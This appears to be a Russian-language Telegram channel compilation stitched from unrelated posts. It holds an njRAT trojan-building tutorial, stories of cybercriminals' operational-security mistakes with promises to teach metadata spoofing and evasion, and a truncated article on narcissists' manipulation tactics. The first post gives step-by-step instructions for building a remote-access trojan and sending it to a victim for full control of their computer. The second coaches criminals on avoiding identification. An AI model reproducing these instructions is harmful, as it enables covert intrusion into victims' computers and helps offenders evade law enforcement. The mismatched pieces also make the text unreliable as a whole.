Даркнетчик.

IMG_20200625_085247_968.jpg


Как управлять чужим компьютером с помощью вируса

Добрый вечер, друзья. Полагаю, многие из вас уже слышали о такой утилите, как njRAT, также известной как Bladabindi. Она является трояном удаленного доступа, который позволяет владельцу программы полностью контролировать компьютер конечного пользователя без его согласия. С помощью него мы и будем получать доступ к удаленному устройству.

❗️Вся информация предоставлена исключительно в ознакомительных целях.

Настройка?‍?

1. Нужно скачать njRAT с хранилища Github и установить его.
2. Затем открываем порты, благо, информации об этом в сети предостаточно.
3. После запуска программы вводим порт, который только что открыли и нажимаем кнопку «Start».
4. Чтобы создать вирус, переходим в меню «Builder», что находиться в левом нижнем углу. В появившемся окне прописываем информацию: «Host» и «Port», у каждого они индивидуальные, вводим свои; Затем следует поле с именем будущего файла, вписываем любое; «ExeName», это название будущего процесса в Диспетчере задач; «Directory», путь в котором будет храниться копия файла, выбираем самый надежный «%AppData%».
5. Справа находятся дополнительные, защитные, настройки. Активируем все галочки, за исключением последнего пункта.
6. Нажимаем «Builder» и сохраняем файл.

Использование

Создался новый файл, который и будет активировать вирус удаленного доступа. Его можно отправить будущей жертве. В случае запуска, в программе njRAT появиться дополнительное окно, в котором будет отображен компьютер жертвы. Кликаем правой кнопкой мыши по этому полю и получаем полный контроль над удаленным устройством.
 
IMG_20200625_193452_253.jpg

Роковые ошибки киберпреступников
ВСЯ ИНФОРМАЦИЯ НА КАНАЛЕ ПРЕДОСТАВЛЕНА В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ, МЫ НЕ ПРИЗЫВАЕМ К ДЕЙСТВИЯМ
Я забыл включить
VPN Житель Великобритании Томаш Скоурон похищал деньги при помощи вредоносного программного обеспечения. Использовалась проверенная временем схема: с помощью трояна похищался доступ к интернет-банкингу, и дальше деньги переводились на подставных лиц, которые затем их обналичивали. Таким образом преступникам удалось вывести свыше 1 миллиона долларов со счетов по всему миру.
Томаш Скоурон занимался непосредственно переводами средств со взломанных счетов, и однажды его VPN дал сбой. Подлинный IP-адрес киберпреступника оказался в логах подключений к счету интернет-банка жертвы. Через некоторое время Томаша ожидал визит правоохранительных органов, а после приговор – 5 лет тюремного заключения.
Даже если преступник использует VPN, всегда остается вероятность сбоя в работе программного обеспечения, например, соединение может «отвалиться» незаметно для пользователя, или при обрыве интернета приложение для VPN не успеет перенаправить интернет-трафик на VPN-сервер, и часть данных уйдет в обход VPN. А бывает и так, что VPN просто забывают включить.
Даже если VPN содержит функцию блокировки данных в обход VPN, все равно возможны сбои в работе (я уже рассказывал об этом в главе про баги и ошибки). Они бывают у всех, просто у некоторых программ «падение» сервиса приведет к неприятному уведомлению об ошибке, и пользователю придется перезапустить программу, в случае ошибки VPN подлинный IP-адрес хакера окажется в руках правоохранительных органов.
Эффективным решением может стать использование Whonix-Gateway в качестве firewall; к счастью для наших банковских счетов, Томаш Скоурон об этом не знал. В рамках курса я покажу несколько путей надежной блокировки утечек, но Whonix-Gateway считал и считаю самым надежным из них, хотя и не самым удобным.
Документы помнят, кто их открывал и редактировал
Речь идет о Microsoft Office и офисных продуктах Apple, таких как Pages и Numbers. Это полезная опция, позволяющая узнать, кто, когда и какие правки вносил в документ. Безопасная для любого, но только не для хакера, просматривающего украденные документы и в дальнейшем планирующего их опубликовать.
Вероятно, вы слышали про взлом электронной переписки и публикацию документов Демократической партии США в июле 2016 года, об этом много писали в СМИ, и мне не хотелось бы пересказывать эту историю. И возможно, вы слышали про «русский след» в этом деле, давайте разберем доказательства данной версии.
Первое – анализ выложенных документов показал, что в редактировании их принимал участие русскоязычный пользователь «Феликс Эдмундович», и, что особенно важно, его имя было написано кириллицей.
Второе – документы и сайт, где они были выложены, содержали достаточно доказательств, указывающих, что за этим стоит русскоязычный пользователь. Банальный пример – смайлик в виде трех скобочек «)))», который популярен на территории бывшего СНГ.
Третье – правки проводились с взломанной версии Microsoft Word, которая популярна, как ни странно, на территории России. Ну и самое главное, четвертое – сообщения об ошибках на русском языке, возникших в ходе конвертации документа в русскоязычной версии программы.
Видите, даже используемая версия офисного ПО может стать косвенным инструментом для сужения круга поиска хакера или разрушения легенды, когда хакер пытается выдать себя за того, кем на самом деле не является.
В рамках курса мы будем обучать вас удалению метаданных из различных видов документов и подмене данных об используемом при редактировании программном обеспечении. Не исключено, когда-нибудь вам понадобится этот навык.
Картинки сохраняют место съемки
Хакер Хигинио Очоа, как и «Феликс Эдмундович» из предыдущей истории, любил взламывать различные американские ресурсы и выкладывать данные в сеть. В одну из публикаций он поместил сделанную на iPhone фотографию девушки с надписью «PwNd by w0rmer & CabinCr3w <3 u BiTch's !».
Это стало роковой ошибкой, так как фотография сохранила координаты места съемки. И хотя по ним нашли только его девушку, с этого момента он был обречен и остальное было делом техники. К счастью, многие популярные сайты сейчас удаляют координаты места съемки при загрузке, многие, но не все.
Уметь проверять наличие координат места съемки в метаданных фотографии и удалять их – полезный навык, но в рамках курса мы им не ограничимся, мы будем подменять место съемки. Например, фотография, сделанная в Москве, будет содержать координаты глубинки сибирской тайги.
Место съемки не единственное, что можно выяснить по фотографии и о чем стоит задуматься при выкладывании снимка в сеть, подробнее этому вопросу посвящена отдельная глава.
Конец эпохи телефонного терроризма
Эта технология уже активно внедряется в банках, в ряде стран она есть в арсенале спецслужб, и старая схема «купил одноразовый мобильный для одного анонимного звонка» уже не работает. У каждого голоса есть свой уникальный отпечаток, по которому можно идентифицировать его владельца – это знают многие. А вот то, что изменения в голосе, которые вносят стандартные программы для изменения голоса, не проблема и не защищают от детекта, – это становится сюрпризом.
Виталик из провинциального городка России решил поучаствовать в масштабной акции по «минированию» вокзалов Москвы. Для этого он обзавелся интернет-телефонией, Double VPN и программой для изменения голоса. Аккаунт для голосовой телефонии, беспокоясь о своей анонимности, он приобрел на андеграунд-форуме. Хороший набор профессионального телефонного террориста, не так ли?
Вокзал он успешно «заминировал», и до ночи радовался успеху, смотря новости. Утром Виталик уже сам стал участником местных криминальных новостей: к нему пришли с обыском ребята из федеральной службы безопасности. Сейчас Виталик ждет суда и в лучшем случае огромного штрафа.
Вычислить его помог отпечаток голоса. Звонок Виталика был записан, затем эксперты обработали его, восстановив оригинальный голос. Программа, которая так успешно изменяла голос, не стала серьезной преградой, а образец его отпечатка голоса оказался в базе данных, которая в России объединенная: доступ к ней имеют и банки, и правоохранительные структуры.
Социальные сети – лучшие враги хакеров
Многим интересно было бы знать, кто просматривает их странички в социальных сетях, как долго и как часто. Страницу Дмитрия Смилянца, молодого и успешного человека, просматривали не только друзья, родственники и поклонницы, но еще и агенты ФБР.
Им он был известен как киберпреступник под псевдонимом «Смелый». В июле 2013 года он выложил в инстаграм свою фотографию, где позировал на фоне надписи «I Amsterdam». Агенты незамедлительно обзвонили отели поблизости, и в одном из них им сообщили, что Дмитрий Смилянец действительно проживает у них, но в настоящий момент спит.
IMG_20200625_193112_992.jpg
Следующее утро оказалось для Дмитрия последним на свободе, его ждал арест и передача в руки американского правосудия. В конечном итоге он проведет за решеткой 5 лет.
Почему было бы просто не объявить его в розыск? Русские хакеры прекрасно умеют получать информацию о розыске со стороны Интерпола, и, естественно, официально разыскиваемый хакер не будет покидать пределы России или будет делать это с максимальными мерами предосторожности в страны, где ФБР не сможет запросить его экстрадицию. Потому агенты следят за подозреваемыми при помощи социальных сетей, и, как видите, это дает результат.
Я бы хотел рассказать об еще одной довольно поучительной ошибке киберпреступника, занимавшегося нехорошим делом‒торговлей вредоносным программным обеспечением. Он был посредником, или так называемым реселлером. Работая с несколькими разработчиками вредоносного программного обеспечения, он заработал репутацию и отлично знал теневые рынки.
Но популярным торговцем вредоносным ПО Алексей (назовем его так) стал не сразу, начинал он с попыток взламывать почтовые ящики и предлагал услуги через социальную сеть «Вконтакте». Действовал он достаточно примитивно: при помощи купленного на черном рынке набора для фишинга пробовал поймать жертв на невнимательности. Выходило это нечасто, но в тот момент вчерашнему школьнику это казалось невероятно прибыльным делом.
Естественно, все крутые хакеры имеют какой-нибудь крутой никнейм, и Алексей не стал исключением, придумав себе новое «хакерское» имя. Его он внес в название своей странички в социальной сети, оно же выводилось в ссылке на страничку после слэш (/).
Прошли годы, и Алексей уже не хакер-самоучка, а выдающийся профессионал, которого разыскивают правоохранительные органы не одной страны мира. Но кое-что с тех времен сохранилось – и это его уникальный никнейм. И вот, собирая информацию о нем, правоохранительные органы наткнулись на его старую страничку.
Будущий серьезный киберпреступник, не вылезающий за пределы Тор, в то время заходил в социальную сеть со своего домашнего IP-адреса и давал заказчикам услуг для оплаты кошелек, оформленный на свои паспортные данные. Находка странички с информацией о нем спустя несколько лет приведет к его аресту.
VPN, Tor и proxy не являются преградой
VPN, Tor и proxy не являются преградой, и использующие их могут быть деанонимизированы. Большой ошибкой будет не верить в это, есть масса способов получить подлинный IP-адрес.
Не только IP-адрес опасен
Еще одним большим заблуждением является уверенность, что к установлению личности может привести только IP-адрес. Многие идентификаторы способны привести к установлению личности, но особенно опасен MAC-адрес. Как личности киберпреступников устанавливаются при помощи MAC-адреса, мы уже рассказывали в этой главе.
 
В этой статье я вам расскажу о 20 опасных приемах, которые могут быть использованы против вас.
1. Газлайтинг
Газлайтинг – это манипулятивный прием, который проще всего проиллюстрировать такими типичными фразами: “Не было такого”, “Тебе показалось” и “Ты с ума сошла?”. Газлайтинг – пожалуй, один из самых коварных приемов манипуляции, потому что направлен на то, чтобы исказить и подорвать ваше чувство реальности; он разъедает вашу способность доверять себе, и в результате вы начинаете сомневаться в правомерности своих жалоб на оскорбления и плохое обращение.
Когда нарцисс, социопат или психопат использует эту тактику против вас, вы автоматически становитесь на его сторону, чтобы уладить возникший когнитивный диссонанс. В вашей душе борются две непримиримых реакции: либо он ошибается, либо мои собственные чувства. Манипулятор попытается убедить вас, что первое совершенно исключено, а последнее – чистая правда, свидетельствующая о вашей неадекватности.
Чтобы успешно противостоять газлайтингу, очень важно найти опору в собственной реальности: иногда бывает достаточно записать происходящее в дневник, рассказать друзьям или поделиться с группой поддержки. Ценность поддержки со стороны в том, что она может помочь вам вырваться из искаженной реальности манипулятора и посмотреть на вещи самостоятельно.
2. Проекция
Один верный признак деструктивности – это когда человек хронически не желает видеть свои собственные недостатки и использует всё, что в его силах, чтобы избежать ответственности за них. Это называется проекцией. Проекция представляет собой защитный механизм, используемый для вытеснения ответственности за свои отрицательные черты характера (@darknet4ik) и поведение путем приписывания их другому. Таким образом манипулятор уклоняется от признания своей вины и ответственности за последствия.
Хотя все мы в той или иной степени прибегаем к проекции, клинический специалист по нарциссическому расстройству д-р Мартинес-Леви отмечает, что у нарциссов проекции часто становятся формой психологического насилия.
Вместо того, чтобы признать собственные недостатки, изъяны и проступки, нарциссы и социопаты предпочитают сваливать свои собственные пороки на своих ничего не подозревающих жертв, причем самым неприятным и жестоким образом. Вместо того, чтобы признать, что им не помешало бы заняться собой, они предпочитают внушать чувство стыда своим жертвам, перекладывая на них ответственность за свое поведение. Таким образом нарцисс заставляет других испытывать тот горький стыд, который ощущает по отношению к самому себе.
Например, патологический лжец может обвинить свою партнершу во вранье; нуждающаяся жена может назвать своего мужа “прилипчивым” в попытке выставить зависимым именно его; плохой работник может назвать начальника неэффективным, чтобы избежать правдивого разговора о собственной производительности.
Самовлюбленные садисты обожают играть в “перекладывание вины”. Цели игры: они выигрывают, вы проигрываете, итог – вы или весь мир в целом виноваты во всем, что случилось с ними. Таким образом, вам приходится нянчить их хрупкое эго, а в ответ вас толкают в море неуверенности и самокритики. Классно придумано, да?
Решение? Не “проецируйте” собственное чувство сострадания или сочувствия на деструктивного человека и не принимайте его ядовитых проекций на себя. Как пишет специалист по манипуляциям д-р Джордж Саймон в своей книге “В овечьей шкуре” (2010), проецирование собственной совестливости и системы ценностей на других может поощрить дальнейшую эксплуатацию.
Нарциссы на крайнем конце спектра, как правило, совершенно не заинтересованы в самоанализе и переменах. Важно как можно скорее разорвать всякие отношения и связи с деструктивными людьми, чтобы опереться на собственную реальность и начать ценить себя. Вы не обязаны жить в клоаке чужих дисфункций.
3. Адски бессмысленные разговоры
Если вы надеетесь на вдумчивое общение с деструктивной личностью, вас ждет разочарование: вместо внимательного собеседника вы получите эпический мозготрах.
Нарциссы и социопаты используют поток сознания, разговоры по кругу, переход на личности, проекцию и газлайтинг, чтобы сбить вас с толку и запутать, стоит вам только в чем-то не согласиться или оспорить их. Это делается для того, чтобы дискредитировать, отвлечь и расстроить вас, увести в сторону от главной темы и заставить испытывать чувство вины за то, что вы – живой человек с реальными мыслями и чувствами, которые смеют отличаться от их собственных. В их глазах вся проблема – в вашем существовании.
Достаточно десяти минут спора с нарциссом – и вы уже гадаете, как вообще в это ввязались. Вы всего лишь выразили несогласие с его нелепым утверждением, будто небо – красное, а теперь всё ваше детство, семья, друзья, карьера и образ жизни смешаны с грязью. Это потому, что ваше несогласие противоречит его ложному убеждению, будто он всесилен и всезнающ, что приводит к так называемой нарциссической травме.
Помните: деструктивные люди спорят не с вами, они, по сути, спорят сами с собой, вы – лишь соучастник долгого, изнуряющего монолога. Они обожают драматизм и живут ради него. Пытаясь подобрать аргумент, опровергающий их нелепые утверждения, вы лишь подбрасываете дровишек в огонь. Не кормите нарциссов – лучше скормите себе понимание того, что проблема не в вас, а в их оскорбительном поведении. Прекратите общение, как только почувствуете первые признаки нарциссизма, и потратьте это время на что-нибудь приятное.
4. Обобщения и голословные утверждения
Нарциссы не всегда могут похвастаться выдающимся интеллектом – многие из них вообще не привыкли думать. Вместо того, чтобы тратить время и разбираться в различных точках зрения, они делают обобщения на основании любых ваших слов, игнорируя (@darknet4ik) нюансы вашей аргументации и ваши попытки принять во внимание разные мнения. А еще проще навесить на вас какой-нибудь ярлык – это автоматически перечеркивает ценность любого вашего заявления.
В более широких масштабах обобщения и голословные утверждения часто применяются для обесценивания явлений, которые не вписываются в безосновательные общественные предрассудки, схемы и стереотипы; они также используются для поддержания статус-кво. Таким образом какой-нибудь один аспект проблемы раздувается настолько, что серьезный разговор становится невозможным. Например, когда популярных личностей обвиняют в изнасиловании, многие тут же принимаются кричать о том, что подобные обвинения иногда оказываются ложными. И, хотя ложные обвинения действительно бывают, всё же они довольно-таки редки, а в данном случае действия одного человека приписываются большинству, тогда как конкретное обвинение игнорируется.
Такие повседневные проявления микроагрессии типичны для деструктивных отношений. К примеру, вы говорите нарциссу, что его поведение неприемлемо, а в ответ он тут же делает голословное утверждение о вашей сверхчувствительности или обобщение типа: “Ты вечно всем недовольна” или “Тебя вообще ничего не устраивает”, вместо того, чтобы обратить внимание на реально возникшую проблему. Да, возможно, вы иногда проявляете сверхчувствительность – но не менее вероятно, что ваш обидчик проявляет нечувствительность и черствость большую часть времени.
Не отступайте от правды и старайтесь противостоять необоснованным обобщениям, ведь это лишь форма совершенно нелогичного черно-белого мышления. За деструктивными людьми, разбрасывающимися голословными обобщениями, не стоит всё богатство человеческого опыта – лишь их собственный ограниченный опыт вкупе с раздутым чувством собственного достоинства.
5. Намеренное извращение ваших мыслей и чувств до полного абсурда
В руках нарцисса или социопата ваши расхождения во мнениях, вполне оправданные эмоции и реальные переживания превращаются в недостатки характера и доказательства вашей иррациональности.
Нарциссы сочиняют всяческие небылицы, перефразируя сказанное вами так, чтобы ваша позиция выглядела абсурдной или неприемлемой. Скажем, вы указываете деструктивному другу, что вам не нравится, каким тоном он с вами разговаривает. В ответ он перекручивает ваши слова: “Ах, а ты у нас, значит, само совершенство?” или “То есть я, по-твоему, плохой?” – хотя вы всего лишь выразили свои чувства. Это дает им возможность аннулировать ваше право на мысли и эмоции по поводу их неподобающего поведения и прививает вам чувство вины, когда вы пытаетесь установить границы.
Этот распространенный отвлекающий маневр является когнитивным искажением, которое называют “чтением мыслей”. Деструктивные люди уверены, будто им известны ваши мысли и чувства. Они регулярно делают поспешные выводы на основании собственных реакций, вместо того, чтобы внимательно выслушать вас. Они действуют соответствующим образом на основе собственных иллюзий и заблуждений и никогда не извиняются за тот вред, который наносят в результате. Большие мастера вкладывать слова в чужие уста, они выставляют вас носителями совершенно дичайших намерений и мнений. Они обвиняют вас в том, что вы считаете их неадекватными, ещё до того, как вы сделаете замечание по поводу их поведения, и это тоже своеобразная форма упреждающей защиты.
Лучший способ провести четкую границу в общении с подобным человеком – просто сказать: “Я такого не говорил(а)”, прекратив разговор, если он продолжит обвинять вас в том, чего вы не делали и не говорили. До тех пор пока деструктивный человек имеет возможность перекладывать вину и уводить разговор в сторону от собственного поведения, он продолжит внушать вам чувство стыда за то, что вы посмели ему в чем-то перечить.
6. Придирки и смена правил игры
Разница между конструктивной и деструктивной критикой – отсутствие личных нападок и недостижимых стандартов. Эти так называемые “критики” не имеют ни малейшего желания помочь вам стать лучше – им просто нравится придираться, унижать и делать из вас козла отпущения. Самовлюбленные садисты и социопаты прибегают к софизму, который называется “смена правил игры”, чтобы гарантировать, что у них есть все основания быть постоянно недовольными вами. Это когда, даже после того, как вы предоставили всевозможные доказательства в подтверждения своего аргумента или приняли все возможные меры для удовлетворения их просьбы, они предъявляют вам новое требование или хотят больше доказательств.
У вас успешная карьера? Нарцисс будет придираться, почему вы до сих пор не мультимиллионер. Вы удовлетворили его потребность в том, чтобы с ним круглосуточно нянчились? А теперь докажите, что можете оставаться “независимой”. Правила игры будут постоянно меняться и запросто могут даже противоречить друг другу; единственная цель этой игры – заставить вас добиваться внимания и одобрения нарцисса.
Постоянно завышая планку ожиданий или вовсе заменяя их новыми, деструктивные манипуляторы способны привить вам всепроникающее чувство никчемности и постоянный страх несоответствия. Выделяя один незначительный эпизод или один ваш промах и раздувая его до гигантских размеров, нарцисс вынуждает вас забыть о собственных достоинствах и вместо этого все время переживать из-за своих слабостей или недостатков. Это заставляет вас думать о новых ожиданиях, которым вам теперь придется соответствовать, и в результате вы из кожи вон лезете, чтобы удовлетворить любое его требование, – а в итоге оказывается, что он обращается с вами все так же плохо.
Не ведитесь на придирки и смену правил игры – если человек предпочитает снова и снова обсасывать какой-то незначительный эпизод, при этом не обращая внимания на все ваши попытки подтвердить свою правоту или удовлетворить его требования, значит, им движет вовсе не желание понять вас. Им движет желание внушить вам чувство, что вы должны постоянно стремиться заслужить его одобрение. Цените и одобряйте себя. Знайте, вы – цельная личность, и не должны постоянно чувствовать себя неблагодарной или недостойной.
7. Смена темы, чтобы уйти от ответственности
Этот маневр я называю “синдром А-как-же-я?”. Это буквальное отступление от обсуждаемой темы с целю перевести внимание на совершенно другую. Нарциссам не хочется обсуждать вопрос их личной ответственности, поэтому они уводят разговор в нужную им сторону. Вы жалуетесь, что он не уделяет время детям? Он напомнит вам об ошибке, которую вы допустили семь лет назад. Этот маневр не знает ни временных, ни тематических рамок и часто начинается со слов: “А когда ты…”
На общественном уровне эти приемы используются, чтобы сорвать дискуссии, которые ставят под сомнение статус-кво. Разговор о правах геев, например, может быть сорван, стоит лишь кому-то из участников поднять вопрос о другой насущной проблеме, отвлекая всеобщее внимание от изначального спора.
Как отмечает Тара Мосс, автор книги “Speaking Out: A 21st Century Handbook for Women and Girls”, для надлежащего рассмотрения и решения вопросов нужна конкретика – это не значит, что поднятые попутно темы не важны, это просто значит, что для каждой темы есть свое время и свой контекст.
Не отвлекайтесь; если кто-то пытается подменить понятия, используйте метод “заевшей пластинки”, как я его называю: продолжайте упорно повторять факты, не уходя в сторону от темы. Переведите стрелки обратно, скажите: “Я сейчас не об этом. Давай не будем отвлекаться”. Если не поможет, прекратите разговор и направьте свою энергию в более полезное русло – например, найдите собеседника, не застрявшего в умственном развитии на уровне трехлетнего малыша.
8. Скрытые и явные угрозы
Нарциссы и прочие деструктивные личности чувствуют себя очень некомфортно, когда их вера в то, что весь мир им обязан, ложное чувство превосходства или колоссальное самолюбие ставятся кем-то под сомнение. Они склонны выдвигать необоснованные требования к другим – и при этом наказывать вас за несоответствие их недостижимым ожиданиям.
Вместо того, чтобы зрело решать разногласия и искать компромисс, они пытаются лишить вас права на собственное мнение, стремясь приучить бояться последствий любого несогласия с ними или несоблюдения их требований. На любое разногласие они отвечают ультиматумом, их стандартная реакция – “делай так, иначе я сделаю эдак”.
Если в ответ на ваши попытки обозначить грань или высказать отличное мнение вы слышите приказной тон и угрозы, будь то завуалированные намеки или подробные обещания наказаний, это верный признак: перед вами человек, который уверен, что ему все должны, и он никогда не пойдет на компромисс. Примите угрозы всерьез и покажите нарциссу, что вы не шутите: по возможности задокументируйте их и сообщите в надлежащие инстанции.
9. Оскорбления
Нарциссы превентивно раздувают из мухи слона, стоит им почуять малейшую угрозу своему чувству превосходства. В их понимании только они всегда правы, и всякий, кто посмеет сказать иначе, наносит им нарциссическую травму, приводящую к нарциссической ярости. По словам д-ра Марка Гулстона, нарциссическая ярость – результат не низкой самооценки, а скорее уверенности в собственной непогрешимости и ложного чувства превосходства.
У самых низких представителей этого типа нарциссическая ярость принимает форму оскорблений, когда им не удается иначе повлиять на ваше мнение или эмоции. Оскорбления – простой и быстрый способ обидеть, унизить и высмеять ваши умственные способности, внешний вид или поведение, попутно лишая вас права быть человеком со своим собственным мнением.
Оскорбления также могут быть использованы, чтобы критиковать ваши убеждения, мнения и идеи. Обоснованная точка зрения или убедительное опровержение внезапно становится “смешным” или “идиотским” в руках нарцисса или социопата, который чувствует себя уязвленным, но не может ничего возразить по существу. Не найдя в себе сил атаковать вашу аргументацию, нарцисс атакует вас самих, стремясь всеми возможными способами подорвать ваш авторитет и поставить под сомнение ваши умственные способности. Как только в ход идут оскорбления, необходимо прервать дальнейшее общение и недвусмысленно заявить, что вы не намерены это терпеть. Не принимайте это на свой счет: поймите, они прибегают к оскорблениям только потому, что им неведомы другие способы донести свою точку зрения.
10. “Дрессировка”
Деструктивные люди приучают вас ассоциировать свои сильные стороны, таланты и счастливые воспоминания с жестоким обращением, разочарованиями и неуважением. С этой целью они как бы невзначай допускают уничижительные высказывания о ваших качествах и свойствах, которыми они сами когда-то восхищались, а также саботируют ваши цели, портят вам праздники, отпуска и выходные. Они могут даже изолировать вас от друзей и близких и сделать вас финансово зависимыми от них. Вас, как собак Павлова, по сути “дрессируют”, вырабатывая у вас боязнь делать всё то, что когда-то делало вашу жизнь насыщенной.
Нарциссы, социопаты, психопаты и прочие деструктивные личности делают это, чтобы отвлечь всё внимание на себя и на то, как вы можете удовлетворять их потребности. Если какой-то внешний фактор может помешать им целиком и полностью контролировать вашу жизнь, они стремятся его уничтожить. Им нужно всё время находиться в центре внимания. На этапе идеализации вы были центром мира нарцисса – а теперь нарцисс должен быть центром вашего мира.
Кроме того, нарциссы по природе своей патологически ревнивы и не выносят мысли о том, что что-то может хотя бы на самую малость оградить вас от их влияния. Для них ваше счастье представляет собой все, что недоступно им в их эмоционально скудном существовании. В конце концов, если вы обнаружите, что можете получать уважение, любовь и поддержку от кого-то недеструктивного, то что удержит вас от того, чтобы расстаться с ними? В руках деструктивного человека “дрессировка” – действенный способ заставить вас ходить на цыпочках и всегда останавливаться на полпути к мечте.
11. Клевета и преследование
Когда деструктивные личности не могут контролировать то, как вы воспринимаете себя, они начинают контролировать то, как другие воспринимают вас; они принимают роль мученика, выставляя вас деструктивными. Клевета и сплетни – это упреждающий удар, призванный разрушить вашу репутацию и очернить ваше имя, чтобы у вас не осталось поддержки на тот случай, если вы всё же решитесь разорвать отношения и уйти от деструктивного партнера. Они даже могут преследовать и изводить вас или ваших знакомых, якобы чтобы “разоблачить” вас; такое “разоблачение” -лишь способ скрыть свое собственное деструктивное поведение, проецируя его на вас.
Иногда сплетни ожесточают друг против друга двоих или даже целые группы людей. Жертва в деструктивных отношениях с нарциссом часто не знает, что о ней говорят, пока отношения длятся, но обычно вся правда выплывает наружу, когда они рушатся.
Деструктивные люди будут сплетничать у вас за спиной (и в лицо тоже), рассказывать о вас гадости вашим или своим близким, распускать слухи, выставляющие вас агрессором, а их – жертвой, и приписывать вам именно такие поступки, обвинения в которых с вашей стороны они больше всего опасаются. Кроме того, они будут методично, скрытно и намеренно обижать вас, чтобы потом приводить ваши реакции в качестве доказательства того, что именно они являются “жертвой” в ваших отношениях.
Лучший способ противодействовать клевете – это всегда держать себя в руках и придерживаться фактов. Это особенно актуально для конфликтных разводов с нарциссами, которые могут специально провоцировать вас, чтобы потом использовать ваши реакции против вас. По возможности документируйте любые формы преследования, запугивания и оскорбления (в т. ч. онлайн), старайтесь общаться с нарциссом только через своего адвоката. Если речь идет о преследовании и запугивании, стоит обратиться к правоохранителям; желательно найти адвоката, который хорошо разбирается в нарциссическом расстройстве личности. Ваша честность и искренность будут говорить сами за себя, когда с нарцисса начнет сползать маска.
12. Бомбардировка любовью и обесценивание
Деструктивные люди проводят вас через этап идеализации, пока вы не клюнете на приманку и не начнете с ними дружеские или романтические отношения. Тогда они принимаются обесценивать вас, выражая презрение ко всему, что их изначально в вас привлекло. Другой типичный случай – когда деструктивный человек возносит вас на пьедестал и принимается агрессивно обесценивать и унижать кого-то другого, кто угрожает его чувству превосходства.
Нарциссы делают это постоянно: они ругают своих бывших при новых партнерах/партнершах, и со временем начинают относиться к новым с таким же пренебрежением. В конечном итоге любая партнерша нарцисса испытает на себе всё то же, что и предыдущие. В таких отношениях вы неизбежно станете очередной бывшей, которую он будет точно так же поносить при своей следующей подруге. Просто вы этого еще не знаете. Поэтому не забывайте о методе бомбардировки любовью, если поведение вашего партнера с другими резко контрастирует с той приторной слащавостью, которую он демонстрирует в отношениях с вами.
Как советует инструктор по личностному росту Венди Пауэлл, хороший способ противостоять любовным бомбардировкам со стороны человека, который кажется вам потенциально деструктивным, – это не торопиться. Учтите: то, как человек отзывается о других, может предвещать то, как он однажды будет относиться к вам.
13. Превентивная оборона
Когда кто-то усиленно подчеркивает, что он(а) – “хороший парень” или “хорошая девушка”, сразу принимается говорить, что вам стоит “доверять ему (ей)”, или ни с того ни с сего уверяет вас в своей честности – будьте осторожны.
Деструктивные и склонные к насилию личности преувеличивают свою способность быть добрыми и сострадательными. Они часто говорят вам, что вы должны им “доверять”, без предварительного создания прочной основы для такого доверия. Они могут умело “маскироваться”, изображая высокий уровень сочувствия и сопереживания в начале ваших отношений, только чтобы потом раскрыть свою истинную личину. Когда цикл насилия достигает этапа обесценивания, маска начинает сползать, и вы видите их истинную сущность: ужасающе холодную, черствую и пренебрежительную.
Подлинно хорошим людям редко приходится постоянно хвалиться своими положительными качествами – они скорее источают тепло, чем говорят об этом, и знают, что поступки гораздо важнее слов. Они знают, что доверие и уважение – это улица с двусторонним движением, требующая взаимности, а не постоянного внушения.
Чтобы противостоять превентивной обороне, задумайтесь, почему человек подчеркивает свои хорошие качества. Потому что думает, что вы ему не доверяете, – или потому что знает, что не заслуживает доверия? Судите не по пустым словам, а по поступкам; именно поступки сообщат вам, соответствует ли человек перед вами тому, за которого себя выдает.
14. Триангуляция
Отсылка к мнению, точке зрения или угрозе привлечения постороннего человека в динамику общения называется “триангуляцией”. Распространенный прием для утверждения правоты деструктивного индивида и обесценивания реакций его жертвы, триангуляция часто приводит к возникновению любовных треугольников, в которых вы чувствуете себя беззащитной и неуравновешенной.
Нарциссы обожают триангулировать партнера/партнершу с незнакомыми людьми, коллегами, бывшими супругами, друзьями и даже членами семьи, чтобы вызвать в них ревность и неуверенность. Они также используют мнение других, чтобы подтвердить свою точку зрения.
Этот маневр призван отвлечь ваше внимание от психологического насилия и представить нарцисса в положительном образе популярного, желанного человека. Плюс вы начинаете сомневаться в себе: раз Мэри согласна с Томом, выходит, я всё-таки неправа? На самом деле, нарциссы с удовольствием “пересказывают” вам гадости, якобы сказанные о вас другими, при том что сами говорят гадости у вас за спиной.
Чтобы противостоять триангуляции, помните: с кем бы ни триангулировал вас нарцисс, этот человек также триангулирован вашими отношениями с нарциссом. По сути, нарцисс руководит всеми ролями. Ответьте ему собственной “триангуляцией” – найдите поддержку третьей стороны, неподвластной ему, и не забывайте о том, что ваша позиция тоже имеет ценность.
15. Заманить и притвориться невинным
Деструктивные личности создают ложное чувство безопасности, чтобы им было проще продемонстрировать свою жестокость. Стоит такому человеку втянуть вас в бессмысленную, случайную ссору – и она быстро перерастет в разборки, потому что ему неведомо чувство уважения. Мелкое несогласие может оказаться приманкой, и даже если сначала вы будете сдерживаться в рамках вежливости, то быстро поймете, что им руководит зловредное желание вас унизить.
“Заманив” вас невинным на первый взгляд комментарием, замаскированным под рациональный довод, они начинают играть с вами. Помните: нарциссам известны ваши слабости, неприятные фразы, подрывающие вашу самоуверенность, и больные темы, вскрывающие старые раны, – и они используют эти знания в своих кознях, чтобы спровоцировать вас. После того, как вы проглотите наживу целиком, нарцисс успокоится и будет невинно спрашивать, “в порядке” ли вы, уверяя, что “не хотел” бередить вам душу. Эта напускная невинность застает вас врасплох и вынуждает поверить, что он на самом деле не собирался причинять вам боль, пока это не начинает происходить так часто, что вы не можете дальше отрицать его очевидной злонамеренности.
Желательно сразу понять, когда вас пытаются заманить, чтобы как можно раньше прекратить общение. Распространенные приемы заманивания – провокационные заявления, оскорбления, обидные обвинения или необоснованные обобщения. Доверьтесь интуиции: если какая-то фраза показалась вам какой-то “не такой”, и это ощущение не прошло даже после того, как собеседник ее растолковал, – возможно, это сигнал, что стоит не торопясь осмыслить ситуацию, прежде чем реагировать.
16. Проверка границ и тактика пылесоса
Нарциссы, социопаты и прочие деструктивные личности постоянно проверяют ваши границы, чтобы понять, какие из них можно нарушать. Чем больше нарушений им удастся совершить безнаказанно, тем дальше они зайдут.
Именно поэтому люди, пережившие эмоциональное и физическое насилие, часто сталкиваются с еще более жестоким обращением всякий раз, когда решают вернуться к своим обидчикам.
